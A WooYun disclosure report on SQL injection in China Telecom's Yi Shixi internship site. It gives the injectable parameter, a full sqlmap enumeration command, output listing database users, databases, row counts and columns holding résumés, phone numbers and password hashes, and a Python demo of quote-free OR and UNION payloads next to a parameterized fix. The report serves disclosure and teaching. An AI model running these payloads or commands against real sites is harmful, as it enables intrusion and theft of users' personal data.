
Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-0144422

Title: China Telecom 翼实习 (Yi Shixi internship site), incomplete fix still allows SQL injection (DBA privileges + hundreds of thousands of users exposed + I know your résumé details)

Vendor: 中国电信 (China Telecom)

Author: 路人甲

Submitted: 2015-10-01 19:07

Fixed: 2015-11-24 17:06

Published: 2015-11-24 17:06

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to third-party partner organisation (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-10-01: Details sent to the vendor, awaiting vendor action
2015-10-10: Vendor confirmed; details disclosed to the vendor only
2015-10-20: Details disclosed to core white hats and domain experts
2015-10-30: Details disclosed to regular white hats
2015-11-09: Details disclosed to trainee white hats
2015-11-24: Details disclosed to the public

Brief description:

I tested this site before: the job search was injectable, and even after it was patched, raising sqlmap's level still produced an injection. Reports were submitted day after day, and half a year later it was finally fixed, so I went back to capturing traffic and found another injection point.

Detailed description:

Capturing traffic gave the following injection point:

http://**.**.**.**/shixibao/cp.php?ac=zhiwei_new&op=get_2&ignore=1&id=1
The id parameter is injectable.
http://**.**.**.**/shixibao/cp.php?ac=zhiwei_new&op=get_2&ignore=1&id=1'
Testing with a trailing single quote returns an error:
MySQL Error
Message: MySQL Query Error
SQL: select * from shixibao_uchome.mm_postclass_detail WHERE parent_id =1斜杠'
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '斜杠'' at line 1
Errno.: 1064
Click here to seek help.


As the error shows, the ' was rewritten to “斜杠'” (the literal word 斜杠, "slash", placed in front of the quote rather than a backslash escape). The filter is not strict and injection is still possible: the quote itself survives, and more importantly parent_id is compared as a bare number with no quoting around the value, so a payload does not need a quote at all to break out. With sqlmap's level raised, the filter is bypassed completely.
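The following is an added example and is not code from the original report or from the 翼实习 site. The site's PHP source is not on the page, so the filter below is a reconstruction from the error message alone (the quote gains a 斜杠 prefix and is otherwise kept), and an in-memory SQLite table with a constructed parent_id column stands in for shixibao_uchome.mm_postclass_detail (MySQL on the real host). It shows why quote filtering does nothing for a parameter in a numeric context, and the validate-and-bind fix.

```python
import re
import sqlite3

# Constructed stand-in for shixibao_uchome.mm_postclass_detail (SQLite in memory
# instead of MySQL). Only parent_id is known from the report's error message; the
# id and name columns and all rows are assumed for illustration.
SCHEMA = """
CREATE TABLE mm_postclass_detail (id INTEGER PRIMARY KEY, parent_id INTEGER, name TEXT);
INSERT INTO mm_postclass_detail VALUES
    (1, 1, 'class-a'), (2, 1, 'class-b'), (3, 2, 'class-c'), (4, 3, 'class-d');
"""


def fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def weak_filter(value):
    """Assumed reconstruction of the site's filter. The report's error shows the
    quote surviving as 斜杠' ("slash" + quote), so the only behaviour we can infer
    is that a quote gets a textual prefix; it is never removed or escaped."""
    return value.replace("'", "斜杠'")


def query_unsafe(conn, id_param):
    """The vulnerable pattern: filtered input concatenated into a numeric context,
    mirroring the query in the report: select * ... WHERE parent_id =<id>."""
    sql = "select * from mm_postclass_detail WHERE parent_id =" + weak_filter(id_param)
    return conn.execute(sql).fetchall()


def query_safe(conn, id_param):
    """The fix: a numeric id is validated as a short decimal integer and then
    bound as a parameter, so nothing from the request ever becomes SQL text."""
    if not re.fullmatch(r"[0-9]{1,9}", id_param):
        raise ValueError("id must be a decimal integer")
    return conn.execute(
        "select * from mm_postclass_detail WHERE parent_id = ?", (int(id_param),)
    ).fetchall()


def run(fn, conn, id_param):
    """Run a query function and report ("rows", rows) or (exception name, message),
    so each failure mode is visible without aborting the demo."""
    try:
        return "rows", fn(conn, id_param)
    except (sqlite3.Error, ValueError) as exc:
        return type(exc).__name__, str(exc)


if __name__ == "__main__":
    conn = fresh_db()
    # The probe from the report: a trailing quote becomes 1斜杠' and breaks the
    # statement (syntax error here; MySQL errno 1064 on the real host).
    print(run(query_unsafe, conn, "1'"))
    # No quote needed in a numeric context: a boolean payload returns every row,
    # and the filter leaves it untouched.
    print(run(query_unsafe, conn, "1 OR 1=1"))
    # A quote-free UNION with matching column count pulls an arbitrary row; payloads
    # that do contain quotes are mangled by the filter, so quote-free ones are what works.
    print(run(query_unsafe, conn,
              "0 UNION SELECT id, parent_id, name FROM mm_postclass_detail WHERE id = 4"))
    # The same payloads against the fixed query are rejected before reaching SQL.
    print(run(query_safe, conn, "1 OR 1=1"))
    print(run(query_safe, conn, "1"))
```

Run it with `python3 demo.py`; the first three calls show a syntax error, a full-table dump and a UNION extraction against the weak filter, while the bound query accepts only "1". The point for the fix is that the check is on type and shape (a decimal integer), not on characters, so there is no blacklist to bypass.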

[screenshot 0.jpg]

Result without --level 5:
[screenshot 1.jpg]

Result with --level 5:
[screenshot 2.jpg]

[screenshot 3.jpg]


sqlmap.py -u "http://**.**.**.**/shixibao/cp.php?ac=zhiwei_new&op=get_2&ignore=1&id=1" --threads 10 --dbms "MySQL" -p id --level 5 --current-db --current-user --is-dba --hostname


sqlmap builds the injection payloads and tests them; output:

[16:29:08] [INFO] testing MySQL
[16:29:08] [INFO] confirming MySQL
[16:29:08] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.5.11, Apache 2.4.9
back-end DBMS: MySQL >= 5.0.0
[16:29:08] [INFO] fetching current user
current user: 'admin@%'
[16:29:08] [INFO] fetching current database
current database: 'shixibao_uchome'
[16:29:08] [INFO] fetching server hostname
hostname: 'WIN-9VCJIM9JGJ2'
[16:29:08] [INFO] testing if current user is DBA
[16:29:08] [INFO] fetching current user
current user is DBA: True
[16:23:38] [INFO] testing MySQL
[16:23:38] [INFO] confirming MySQL
[16:23:38] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.5.11, Apache 2.4.9
back-end DBMS: MySQL >= 5.0.0
[16:23:38] [INFO] fetching database users
database management system users [8]:
[*] ''@'localhost'
[*] 'admin'@'%'
[*] 'admin'@'localhost'
[*] 'cem'@'%'
[*] 'pma'@'localhost'
[*] 'root'@'**.**.**.**'
[*] 'root'@'::1'
[*] 'root'@'localhost'
available databases [16]:
[*] cdcol
[*] cem_db
[*] game
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] shixibao
[*] shixibao_uc
[*] shixibao_uchome
[*] shixibao_uchome_20140525
[*] test
[*] testmql
[*] ultrax
[*] webauth
[*] zhiweibeifen
Database: shixibao_uchome
+----------------------------+---------+
| Table | Entries |
+----------------------------+---------+
| mm_hgz_user | 419959 | <- users
| uchome_spaceinfo | 232626 |
| uchome_creditlog | 77958 |
| mm_member_view | 43670 |
| uchome_member | 43670 | <- members
| uchome_space | 39361 |
| uchome_spacefield | 38057 |
| mm_usereduinfo | 36957 | <- user education info
| mm_userresumeinfo | 36957 | <- user résumé info
| mm_userbaseinfo | 35948 |
| mm_userinfo | 35948 | <- user info
| mm_zhiweiapply_view | 34043 |
| mm_zhiweiinfo | 34043 |
| mm_zhiweiapply_view_1 | 33827 |
| mm_zhiwei_temp | 33302 |
| mm_userinfo_zhiweiinfo_all | 32937 |
| uchome_notification | 22243 |
| uchome_activity_notice | 22100 |
| mm_mailqueue | 21633 |
| mm_youngmembers | 15836 |
| uchome_resume | 13136 |
| mm_userskill_map | 6584 |
| mm_department | 5276 |
| mm_deptinfo | 5240 |
| mm_delivery | 4589 |
| mm_compus_posdeli_view | 4184 |
| mm_useruniversmap | 4157 |
| mm_userunivsmap_view | 4157 |
| mm_personal_zhaopin | 3627 |
| mm_young_tribe | 3222 |
| mm_univs | 3209 |
| mm_user_upload | 2874 |
| jobcollect | 2494 |
| mm_company_interest | 2165 |
| uchome_usertask | 1190 |
| mm_fam_enterprise | 1100 |
| mm_company_visitor | 865 |
| mm_enterprise_zhaopin | 857 |
| uchome_comment | 817 |
| uchome_member_third | 732 |
| mm_post_recommend | 728 |
| mm_zhiwei_questions | 691 |
| mm_home_card | 594 |
| mm_userreg_channel | 559 |
| mm_follow | 510 |
| uchome_stat | 502 |
| mm_zhiwei_send | 428 |
| mm_city | 357 |
| uchome_friend | 350 |
| uchome_coupon | 300 |
| uchome_pic | 296 |
| uchome_visitor | 225 |
| uchome_tagspace | 221 |
| uchome_tagblog | 217 |
| uchome_feed | 203 |
| uchome_tag | 176 |
| mm_employinfo | 174 |
| mm_employinfo_view | 174 |
| mm_score_item | 152 |
| mm_dept_location | 147 |
| uchome_zan | 138 |
| uchome_blogfield | 128 |
| mm_delivercont_view | 123 |
| uchome_blog | 122 |
| uchome_doing | 117 |
| uchome_config | 108 |
| mm_score_stat | 106 |
| mm_lucky_log | 98 |
| mm_score_mark | 97 |
| mm_delivery_attach | 94 |
| uchome_album | 92 |
| mm_taskuser_map | 89 |
| mm_score_marker | 81 |
| mm_themes | 71 |
| mm_score_task | 68 |
| uchome_post | 66 |
| mm_usercode_map | 52 |
| uchome_creditrule | 47 |
| uchome_thread | 44 |
| mm_zhiwei_replayments | 43 |
| mm_grades_user | 42 |
| mm_postclass_detail | 38 |
| mm_provinces | 34 |
| mm_score_template | 34 |
| mm_interview_notice | 26 |
| mm_video_course | 25 |
| uchome_magic | 25 |
| mm_young_report | 24 |
| uchome_magicstore | 24 |
| mm_score_eachsum | 22 |
| mm_replayments | 21 |
| mm_young_report_map | 21 |
| mm_younger_gd_temp | 20 |
| mm_taskcompany_map | 18 |
| mm_attach_files | 15 |
| mm_lucky_wall | 15 |
| uchome_click | 15 |
| mm_subscribe_job | 14 |
| mm_audition_task | 13 |
| mm_questions | 13 |
| uchome_profield | 13 |
| mm_postclass | 12 |
| mm_questions_view | 12 |
| mm_replayments_view | 12 |
| mm_dynamic | 11 |
| uchome_event | 11 |
| uchome_eventfield | 11 |
| uchome_userevent | 11 |
| mm_audition_user | 10 |
| mm_mail_template | 10 |
| mm_report | 10 |
| uchome_mtag | 10 |
| mm_talent_pool | 9 |
| uchome_poke | 9 |
| uchome_usergroup | 9 |
| uchome_data | 8 |
| mm_jianzhi_delivery | 7 |
| mm_sys_post | 7 |
| mm_ztask_classify | 7 |
| uchome_cron | 7 |
| uchome_task | 7 |
| uchome_eventclass | 6 |
| uchome_job | 6 |
| uchome_spacelog | 6 |
| mm_post_attachment | 5 |
| mm_sys_picplay | 5 |
| mm_video_wall | 5 |
| uchome_class | 5 |
| uchome_polloption | 5 |
| mm_like | 4 |
| mm_video_score | 4 |
| uchome_magicinlog | 4 |
| mm_grades_enter | 3 |
| uchome_picfield | 3 |
| uchome_statuser | 3 |
| uchome_usermagic | 3 |
| mm_grade_template | 2 |
| mm_task | 2 |
| uchome_eventpic | 2 |
| uchome_mailqueue | 2 |
| uchome_report | 2 |
| mm_compus_news | 1 |
| mm_score | 1 |
| mm_strategies | 1 |
| mm_students_star | 1 |
| mm_whos_online | 1 |
| uchome_block | 1 |
| uchome_home_card | 1 |
| uchome_invite | 1 |
| uchome_poll | 1 |
| uchome_pollfield | 1 |
| uchome_session | 1 |
| uchome_show | 1 |
+----------------------------+---------+
Database: shixibao
+-------------------------------------+---------+
| Table | Entries |
+-------------------------------------+---------+
| phome_ecms_zhiwei_crawl_copy | 1382607 |
| phome_ecms_jianzhi_crawl | 376758 |
| phome_ecms_zhiwei_crawl_copy_cl | 114558 |
| phome_ecms_zhiwei_crawl | 56813 |
| phome_ecms_zhiwei_crawl_sxs_copy | 51662 |
| phome_ecms_zhiwei | 50579 |
| ecms_post_mapping | 34324 |
| mm_zhiweiapply_view | 34043 |
| phome_ecms_zhiwei_crawl_copy_backup | 19955 |
| phome_ecms_zhiwei_data_1 | 13547 |
| phome_ecms_zhiwei_index | 13498 |
| phome_enewsdolog | 2519 |
| ecms_post_mapping_history | 1907 |
| phome_ecms_zhiwei_crawl_test | 1669 |
| phome_ecms_zhiwei_crawl_1 | 1245 |
| phome_ecms_zhiwei_crawl_sxs | 1024 |
| phome_enewsdownerror | 1008 |
| phome_enewssearch | 942 |
| phome_ecms_jianzhi_crawl_test | 729 |
| phome_enewslog | 456 |
| yjsqzw | 385 |
| phome_enewsf | 199 |
| phome_enewsmemberadd | 75 |
| phome_enewsmember | 73 |
| phome_enewstempbak | 61 |
| phome_enewsclass | 56 |
| phome_enewsclass_stats | 56 |
| phome_enewsclassadd | 56 |
| phome_enewstempdt | 56 |
| phome_enewsdiggips | 52 |
| phome_ecms_info | 41 |
| phome_ecms_info_data_1 | 41 |
| phome_ecms_info_index | 41 |
| phome_ecms_locationorder | 34 |
| phome_ecms_news | 34 |
| phome_ecms_news_data_1 | 34 |
| phome_ecms_news_index | 34 |
| phome_ecms_zhiwei_history | 32 |
| phome_ecms_download | 24 |
| phome_ecms_download_data_1 | 24 |
| phome_ecms_download_index | 24 |
| phome_ecms_movie | 24 |
| phome_ecms_movie_data_1 | 24 |
| phome_ecms_movie_index | 24 |
| phome_ecms_shop | 24 |
| phome_ecms_shop_data_1 | 24 |
| phome_ecms_shop_index | 24 |
| phome_enewsbq | 23 |
| phome_ecms_article | 18 |
| phome_ecms_article_data_1 | 18 |
| phome_ecms_article_index | 18 |
| phome_enewsbqtemp | 17 |
| phome_enewslink | 14 |
| phome_enewslisttemp | 13 |
| phome_enewstable | 13 |
| phome_ecms_flash | 12 |
| phome_ecms_flash_data_1 | 12 |
| phome_ecms_flash_index | 12 |
| phome_enewsmemberf | 12 |
| phome_enewsmod | 12 |
| phome_enewstempvar | 12 |
| phome_enewsnewstemp | 11 |
| phome_enewsfeedbackf | 9 |
| phome_ecms_photo | 7 |
| phome_ecms_photo_data_1 | 7 |
| phome_ecms_photo_index | 7 |
| phome_enewsshoppayfs | 6 |
| phome_ecms_tongzhi | 5 |
| phome_ecms_tongzhi_data_1 | 5 |
| phome_ecms_tongzhi_index | 5 |
| phome_enewsfile_1 | 5 |
| phome_enewsnotcj | 5 |
| phome_enewsbqclass | 4 |
| phome_enewsfile_other | 4 |
| phome_enewsmembergroup | 4 |
| phome_enewsplayer | 4 |
| phome_enewsshopps | 4 |
| phome_enewsuser | 4 |
| phome_enewsuseradd | 4 |
| phome_enewsuserloginck | 4 |
| phome_enewszt | 4 |
| phome_enewsztadd | 4 |
| phome_enewsclassnavcache | 3 |
| phome_enewspage | 3 |
| phome_enewspayapi | 3 |
| phome_enewsadminstyle | 2 |
| phome_enewsclasstemp | 2 |
| phome_enewsgbook | 2 |
| phome_enewsmemberform | 2 |
| phome_enewssearchtemp | 2 |
| phome_enewsspacestyle | 2 |
| phome_enewsvotetemp | 2 |
| phome_enewswapstyle | 2 |
| phome_ecms_infoclass_news | 1 |
| phome_enewsadclass | 1 |
| phome_enewsclass_stats_set | 1 |
| phome_enewsdo | 1 |
| phome_enewsfeedbackclass | 1 |
| phome_enewsfile_member | 1 |
| phome_enewsgbookclass | 1 |
| phome_enewsgroup | 1 |
| phome_enewsindexpage | 1 |
| phome_enewsinfoclass | 1 |
| phome_enewsjstemp | 1 |
| phome_enewsloginfail | 1 |
| phome_enewspageclass | 1 |
| phome_enewspicclass | 1 |
| phome_enewspl_set | 1 |
| phome_enewspltemp | 1 |
| phome_enewspostserver | 1 |
| phome_enewsprinttemp | 1 |
| phome_enewspublic | 1 |
| phome_enewspublic_update | 1 |
| phome_enewspubtemp | 1 |
| phome_enewsshop_set | 1 |
| phome_enewstempgroup | 1 |
| phome_enewsuserlist | 1 |
| phome_enewsuserlistclass | 1 |
| phome_enewsztclass | 1 |
+-------------------------------------+---------+
Database: shixibao_uc
+---------------------+---------+
| Table | Entries |
+---------------------+---------+
| uc_members | 52392 |
| uc_memberfields | 24057 |
| uc_comments | 739 |
| uc_notelist | 573 |
| uc_friends | 144 |
| uc_pms | 74 |
| uc_settings | 27 |
| uc_newpm | 14 |
| uc_applications | 4 |
| uc_failedlogins | 2 |
| uc_protectedmembers | 2 |
+---------------------+---------+
Database: shixibao_uchome_20140525
+---------------------+---------+
| Table | Entries |
+---------------------+---------+
| uchome_spaceinfo | 9899 |
| uchome_feed | 3915 |
| uchome_creditlog | 2886 |
| uchome_space | 1364 |
| uchome_spacefield | 1343 |
| mm_member_view | 1335 |
| uchome_member | 1335 |
| uchome_resume | 1057 |
| uchome_statuser | 511 |
| uchome_visitor | 119 |
| uchome_config | 108 |
| uchome_usertask | 77 |
| mm_department | 75 |
| uchome_creditrule | 47 |
| uchome_magic | 25 |
| uchome_magicstore | 24 |
| uchome_friend | 16 |
| uchome_click | 15 |
| uchome_stat | 12 |
| uchome_usergroup | 9 |
| mm_postclass | 7 |
| uchome_data | 7 |
| uchome_task | 7 |
| uchome_eventclass | 6 |
| uchome_job | 6 |
| uchome_cron | 5 |
| uchome_polloption | 5 |
| uchome_notification | 4 |
| uchome_event | 3 |
| uchome_eventfield | 3 |
| uchome_profield | 3 |
| uchome_userevent | 3 |
| uchome_magicinlog | 2 |
| uchome_usermagic | 2 |
| mm_deptinfo | 1 |
| uchome_mailcron | 1 |
| uchome_mailqueue | 1 |
| uchome_poll | 1 |
| uchome_pollfield | 1 |
+---------------------+---------+
Database: ultrax
+-----------------------------------+---------+
| Table | Entries |
+-----------------------------------+---------+
| pre_common_district | 45051 |
| pre_common_setting | 406 |
| pre_common_member | 138 |
| pre_common_member_count | 125 |
| pre_common_member_field_forum | 125 |
| pre_common_member_field_home | 125 |
| pre_common_member_profile | 125 |
| pre_common_member_status | 125 |
| pre_common_block_style | 103 |
| pre_common_syscache | 103 |
| pre_common_smiley | 85 |
| pre_forum_statlog | 82 |
| pre_common_admincp_perm | 67 |
| pre_common_member_profile_setting | 51 |
| pre_common_nav | 48 |
| pre_common_stylevar | 45 |
| pre_forum_forumfield | 37 |
| pre_forum_forum | 36 |
| pre_common_credit_rule | 31 |
| pre_common_stat | 28 |
| pre_common_credit_rule_log | 26 |
| pre_common_cron | 20 |
| pre_common_onlinetime | 20 |
| pre_common_usergroup | 20 |
| pre_common_usergroup_field | 20 |
| pre_home_click | 15 |
| pre_common_plugin | 12 |
| pre_forum_medal | 10 |
| pre_common_admingroup | 7 |
| pre_forum_typeoption | 6 |
| pre_common_admincp_group | 5 |
| pre_common_friendlink | 5 |
| pre_forum_post | 5 |
| pre_forum_post_tableid | 5 |
| pre_forum_bbcode | 4 |
| pre_forum_onlinelist | 4 |
| pre_forum_thread | 4 |
| pre_forum_grouplevel | 3 |
| pre_forum_imagetype | 3 |
| pre_forum_sofa | 3 |
| pre_common_admincp_session | 2 |
| pre_common_block | 2 |
| pre_common_failedlogin | 2 |
| pre_common_statuser | 2 |
| pre_common_template_block | 2 |
| pre_common_word_type | 2 |
| pre_forum_threadcalendar | 2 |
| pre_forum_threadhot | 2 |
| pre_mobile_setting | 2 |
| pre_mobile_wsq_threadlist | 2 |
| pre_common_diy_data | 1 |
| pre_common_style | 1 |
| pre_common_template | 1 |
| pre_forum_filter_post | 1 |
| pre_forum_threadpartake | 1 |
| pre_forum_threadprofile | 1 |
| pre_home_favorite | 1 |
+-----------------------------------+---------+
Database: cem_db
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| cem_circuit_province_calc | 1762584 |
| cem_circuit_province_quarter_calc | 587528 |
| cem_kmeans_customer_calc | 439524 |
| cem_sfactor_pro_customer_calc | 424572 |
| cem_circuit_qoe | 266167 |
| cem_sfactor_all_customer_calc | 188592 |
| data_original_maintain | 161114 |
| cem_circuit_province_year_calc | 146882 |
| cem_kmeans_customer_quarter_calc | 146508 |
| cem_sfactor_pro_customer_quarter_calc | 141524 |
| cem_circuit_qoe_quarter | 89263 |
| cem_circuit_calc | 88452 |
| cem_sfactor_all_customer_quarter_calc | 62864 |
| cem_maintain | 57285 |
| cem_kmeans_customer_year_calc | 36627 |
| cem_sfactor_pro_customer_year_calc | 35381 |
| cem_circuit_quarter_calc | 29484 |
| data_original_trouble | 23296 |
| cem_circuit_qoe_year | 22924 |
| cem_sfactor_all_customer_year_calc | 15716 |
| cem_customer_rate | 15305 |
| data_original_circuit | 12712 |
| cem_trouble | 12589 |
| numbers | 10000 |
| cem_circuit_info | 7371 |
| cem_circuit_year_calc | 7371 |
| cem_d_time | 4018 |
| data_original_kaitong | 909 |
| cem_kaitong | 830 |
| buffer_industry_rate | 645 |
| cem_busi_prefect_rate | 372 |
| cem_kmeans_province_calc | 372 |
| cem_sfactor_province_calc | 372 |
| cem_busi_prefect_rate_quarter | 124 |
| cem_kmeans_province_quarter_calc | 124 |
| cem_sfactor_province_quarter_calc | 124 |
| buffer_customer_circuit | 72 |
| cem_province | 38 |
| cem_busi_prefect_rate_year | 31 |
| cem_kmeans_province_year_calc | 31 |
| cem_sfactor_province_year_calc | 31 |
| cem_user_customer_relation | 23 |
| cem_customer | 22 |
| cem_customer_selected | 22 |
| cem_indicator | 16 |
| cem_industry | 10 |
| numbers_small | 10 |
| cem_indicator_expect | 8 |
| cem_indicator_threshold | 8 |
| sys_user | 5 |
| sys_user_role | 5 |
| sys_role | 4 |
| cem_business | 3 |
| cem_data_file | 2 |
+---------------------------------------+---------+
Database: game
+---------------+---------+
| Table | Entries |
+---------------+---------+
| game_outwatch | 16 |
| game_admin | 4 |
| game_node | 4 |
| game_path_map | 3 |
| game_mobile | 2 |
| game_path | 2 |
+---------------+---------+


Database: shixibao_uchome
Table: mm_userinfo
[18 columns]
+------------+-----------------------+
| Column | Type |
+------------+-----------------------+
| birthcity | varchar(20) |
| birthyear | smallint(6) unsigned |
| edu_degree | smallint(6) |
| email | varchar(100) |
| endyear | smallint(6) unsigned |
| major | varchar(255) |
| mobile | varchar(40) |
| msn | varchar(80) |
| name | char(20) |
| qq | varchar(20) |
| residecity | varchar(20) |
| resumename | varchar(100) |
| resumeurl | varchar(100) |
| school | text |
| sex | tinyint(1) |
| startyear | smallint(6) unsigned |
| uid | mediumint(8) unsigned |
| username | char(15) |
+------------+-----------------------+
Database: shixibao_uchome
Table: uchome_member
[9 columns]
+-----------+-----------------------+
| Column | Type |
+-----------+-----------------------+
| companyid | int(50) |
| deptid | int(20) |
| hasresume | varchar(255) |
| isactive | tinyint(4) |
| mail | varchar(100) |
| password | char(32) |
| type | int(5) |
| uid | mediumint(8) unsigned |
| username | char(200) |
+-----------+-----------------------+
Database: shixibao_uchome
Table: mm_hgz_user
[18 columns]
+------------+--------------+
| Column | Type |
+------------+--------------+
| address | varchar(200) |
| birth | varchar(200) |
| degree | varchar(200) |
| education | text |
| email | varchar(200) |
| evaluation | text |
| height | varchar(200) |
| hometown | varchar(200) |
| id | int(10) |
| intend | text |
| mobile | varchar(200) |
| name | varchar(200) |
| nation | varchar(200) |
| qq | varchar(200) |
| sex | varchar(200) |
| title | varchar(200) |
| weight | varchar(200) |
| zzmm | varchar(200) |
+------------+--------------+
Database: shixibao_uchome
Table: mm_youngmembers
[16 columns]
+-------------+--------------+
| Column | Type |
+-------------+--------------+
| age | int(5) |
| city | varchar(100) |
| gender | int(1) |
| iskeyperson | int(1) |
| mail | varchar(200) |
| major | varchar(64) |
| name | varchar(200) |
| phone | varchar(50) |
| school | varchar(200) |
| schoolid | int(11) |
| status | int(10) |
| tribeid | int(200) |
| uid | int(10) |
| updatetime | int(10) |
| wechatId | varchar(200) |
| yixinId | varchar(200) |
+-------------+--------------+


[screenshots 4.jpg, 5.jpg, 6.jpg]

Only a part is listed here; I did not go on through the remaining hundreds of thousands of users, nor analyse the tens of millions of other rows.

Proof of vulnerability:

[screenshots 4.jpg, 5.jpg, 6.jpg, as above]

Suggested fix:

Keep filtering! More to the point: id is compared as a bare number, so no amount of quote filtering helps here; cast the value to an integer on the server side or bind it with a prepared statement.

Copyright notice: when reposting, credit 路人甲@乌云 (WooYun).


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 11

Confirmed: 2015-10-10 17:05

Vendor reply:

CNVD confirmed the reported issue and has passed it via CNCERT to China Telecom Group, which will coordinate handling with the website's operating unit.

Latest status:

None yet


Comments:

  1. 2015-10-30 20:13 | _Thorns (regular white hat | Rank: 1064, vulnerabilities: 184 | WooYun is the Bigest gay place :))

    Learned something. There was a China Telecom injection point like this before, too.